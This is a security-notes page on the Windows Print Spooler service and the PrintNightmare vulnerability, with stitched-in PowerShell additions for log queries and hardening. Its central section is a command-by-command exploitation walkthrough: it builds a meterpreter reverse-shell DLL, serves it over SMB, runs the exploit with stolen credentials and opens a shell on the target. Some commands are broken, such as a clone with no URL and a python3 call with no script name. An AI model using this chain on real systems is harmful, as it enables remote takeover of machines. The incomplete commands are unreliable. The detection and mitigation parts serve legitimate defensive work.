Windows Print Spooler Service

Last modified: 2023-08-03


A service that runs on each computer that participates in the Print Services system. It listens on a dynamic RPC port between 49152 and 65535. It may be vulnerable to PrintNightmare (CVE-2021-1675 / CVE-2021-34527).


# Check if the Print Spooler service is running
Get-Service -Name Spooler



  1. Open Services.
  2. Find Print Spooler in the right pane.
  3. Double-click it to view its properties.

Malicious DLL Location


Event Viewer

Open Event Viewer and browse to the following logs in the left pane.
To filter by Event ID, use "Filter Current Log" in the right pane.

  • Application and Services Logs/Microsoft/Windows/PrintService/Admin (Event ID: 808)
  • Application and Services Logs/Microsoft/Windows/PrintService/Operational (Event ID: 316, 811)
  • Application and Services Logs/Microsoft/Windows/SMBClient/Security (Event ID: 31017)
  • Application and Services Logs/Microsoft/Windows/Sysmon/Operational (Event ID: 3, 11, 23, 26)
  • Windows Logs/System (Event ID: 7031)
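The following PowerShell script is an added example (not part of the original page) that queries the same logs and Event IDs listed above with Get-WinEvent instead of clicking through Event Viewer. The seven-day look-back window is a constructed value; the log names are the channel names behind the Event Viewer paths.

```powershell
# Added example: query the event logs listed above for the Event IDs associated
# with Print Spooler abuse. Run in an elevated PowerShell session.
$since = (Get-Date).AddDays(-7)   # constructed look-back window; adjust as needed

# Channel name -> Event IDs, mirroring the Event Viewer paths above
$queries = @(
    @{ LogName = 'Microsoft-Windows-PrintService/Admin';       Id = 808 },
    @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316, 811 },
    @{ LogName = 'Microsoft-Windows-SMBClient/Security';       Id = 31017 },
    @{ LogName = 'Microsoft-Windows-Sysmon/Operational';       Id = 3, 11, 23, 26 },
    @{ LogName = 'System';                                     Id = 7031 }
)

foreach ($q in $queries) {
    $q['StartTime'] = $since
    try {
        Get-WinEvent -FilterHashtable $q -ErrorAction Stop |
            Select-Object TimeCreated, LogName, Id, ProviderName,
                @{ Name = 'Message'; Expression = { $_.Message -replace "`r?`n", ' ' } }
    } catch {
        # Get-WinEvent throws when a channel has no matching events or does not
        # exist on this host (for example when Sysmon is not installed)
        Write-Warning "$($q.LogName): $($_.Exception.Message)"
    }
}
```

The PrintService/Operational channel is disabled by default, so it records nothing until it is enabled (for example with `wevtutil sl Microsoft-Windows-PrintService/Operational /e:true`); enable it before relying on Event IDs 316 and 811. Event ID 7031 in the System log is the Service Control Manager's "service terminated unexpectedly" record, which is why a crashing spooler shows up there.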

Packet Analysis (Wireshark)

Open .pcap file with Wireshark.

Filter packets with "smb" or "smb2".


PrintNightmare is a remote code execution vulnerability in the Print Spooler service.
It requires authentication (a valid username and password).

1. Clone the Repository

git clone

2. Create a Malicious DLL using Msfvenom

mkdir share
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f dll -o ./share/malicious.dll

3. Start Metasploit and Reverse TCP


msf > use exploit/multi/handler
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set lhost <local-ip>
msf > set lport <local-port>

msf > run -j

# Started reverse tcp

msf > jobs

4. Host the Malicious DLL

impacket-smbserver share ./share/ -smb2support

5. Check That the Target Meets the Exploit Criteria

impacket-rpcdump @<target-ip> | egrep 'MS-RPRN|MS-PAR'
# Protocol: [MS-RPRN]: Print System Remote Protocol 
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

6. Run the Exploit

cd CVE-2021-1675
python3 Domain.Controller.local/<username>:<password>@<remote-ip> '\\<local-ip>\share\malicious.dll'

Now we should get a target shell in msfconsole.

7. Interact with Target System

Enter the target system via msfconsole.

msf > sessions
msf > sessions -i <session-id>
meterpreter > shell

C:\Windows\system32> whoami


# Disable the Print Spooler service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
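As an added example (not from the original page), the script below wraps the mitigation above in an audit-then-harden flow: it reports the spooler's state, disables the service on hosts that do not need it, and on print servers keeps the service but sets the RestrictDriverInstallationToAdministrators value from Microsoft's PrintNightmare guidance. The $IsPrintServer switch is an assumed parameter; run the script in an elevated session.

```powershell
# Added example: audit Print Spooler exposure on this host and apply the
# mitigation above when the host is not a print server.
param([switch]$IsPrintServer)   # assumed parameter: pass -IsPrintServer to keep the service

$svc = Get-Service -Name Spooler -ErrorAction Stop
"Spooler status: $($svc.Status), start type: $($svc.StartType)"

# Point and Print hardening value from Microsoft's PrintNightmare guidance
$pp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
$restrict = (Get-ItemProperty -Path $pp -Name RestrictDriverInstallationToAdministrators `
    -ErrorAction SilentlyContinue).RestrictDriverInstallationToAdministrators
"RestrictDriverInstallationToAdministrators: $(if ($null -eq $restrict) { 'not set (default)' } else { $restrict })"

if (-not $IsPrintServer) {
    # Same mitigation as above: stop the service and prevent it from starting again
    if ($svc.Status -ne 'Stopped') { Stop-Service -Name Spooler -Force }
    Set-Service -Name Spooler -StartupType Disabled
    "Spooler stopped and disabled."
} else {
    # Keep the service, but only allow administrators to install printer drivers
    if (-not (Test-Path $pp)) { New-Item -Path $pp -Force | Out-Null }
    New-ItemProperty -Path $pp -Name RestrictDriverInstallationToAdministrators `
        -PropertyType DWord -Value 1 -Force | Out-Null
    "Spooler kept running; driver installation restricted to administrators."
}
```

Re-run the script without -IsPrintServer after patching to confirm the service stays in the Disabled state; a spooler that has come back to Running on a host that never prints is worth investigating with the event log query in the Event Viewer section.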